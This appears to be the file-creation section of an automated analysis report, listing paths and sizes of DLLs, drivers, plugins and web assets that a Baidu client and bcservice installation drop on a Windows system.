    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\yinyueUI.xml (358 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\BDArUtils.dll (68 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\bdzc_Setup_2.0.3.124[1].dll (90365 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\arrow.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\haze.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\bd0001.sys (601 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PluginMgr.dll (49664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Protocol.dll (12024 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe (18640 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-right.png (130 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\app-error.html (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks_z.png (7 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\IPC.dll (86 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\BDMSkin.dll (30464 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-google.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dy.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\advance.png (377 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\bduniptk.sys (1425 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder.png (276 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuDll.dll (3312 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\BDArKit.sys (151 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\auto_complete\top_site.db (10128 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-snow.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\BDWebDownload.dll (7192 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuUI.xml (347 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Update.rdb (6624 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\layout.css (11 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\severe-storm.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\DD_belatedPNG_0.0.8a-min.js (6 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\msvcm80.dll (1760 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\icon_yinyue.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\super-ajax.js (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\box-shadow.css (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\res_resou.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\System.dll (784 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\dl.dll (6433 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\server-storm.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-textbox.png (588 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\png8-ex.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\bdxcore.dll (3684 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history.css (784 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\login-success.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-iconall-1.png (197 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\gz.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\1px.png (947 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\music_play.png (155 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\loading.png (1552 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sunny.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\sc_tmp.dll.bdtmp (90365 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\InstallHelper.dll (3616 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download-hover.png (177 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login_z.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\icon_xinwen.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\appBlackList.dat (8 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db-journal (21734 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-ui-1.10.4.custom.min.js (1552 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-circle-loading.gif (9 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Report.dll (3616 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\gupiaoUI.xml (336 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\bd0001.sys (72 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings.css (2392 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\ProtocolDll.dll (3880 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_m.png (124 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Utils.dll (23296 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\favicon.ico (5 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.atl\microsoft.vc80.atl.manifest (466 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\skinres.rdb (8 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\BDCEnhance.sys (183 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall-1.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\banner.png (5 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\storm.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\msvcr100.dll (25824 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login.css (7 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\login_mods.js (14 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\pack.bat (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-rain.png (864 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\icon_gupiao.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sandstorm.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo57x65.png (4 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\bduniptk.sys (267 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.woff (784 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\screensnapshot.exe (20624 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dust.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\default-icon.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\PluginSetup.xml (612 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\res_jietu.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_m.png (925 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe (13168 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\UIHandler.dll (120372 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\main.js (1552 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\MsgPush.dll (31072 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\history_mods.js (6360 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-unchecked.png (3 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower-with-hail.png (946 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\settings_mods.js (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-storm.png (1 bytes)
    %System%\drivers\bd0001.sys (601 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-flurry.png (479 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LogicMisc.dll (140990 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dy.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\BDCEnhance.sys (112 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-left.png (249 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\msvcr80.dll (3705 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\res_xinwen.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\new.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000301_ad.dat (238 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\uninst.exe (227 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\input.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\skinres.rdb (8 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\icon_jietu.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\bookmarks.html (3 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\config.xml (459 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\BaseDll.dll (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp (447624 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\PluginSetup.xml (625 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\msgconfig.pb (142 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\BugReport.exe (1777 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-1.11.1.min.js (3312 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\BDArKit.sys (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\349.png (3 bytes)
    %Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130892497757287500.dat (221 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\PluginFrame.dll (3786 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\res\InstallWnd.zip (3616 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\BDCEnhance.sys (673 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\ArKit.dll (90 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\executor.xml (234 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\map.js (8 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\res\js\common.js (990 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\DriverManager.dll (160 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcp100.dll (28368 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-loading.gif (5 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
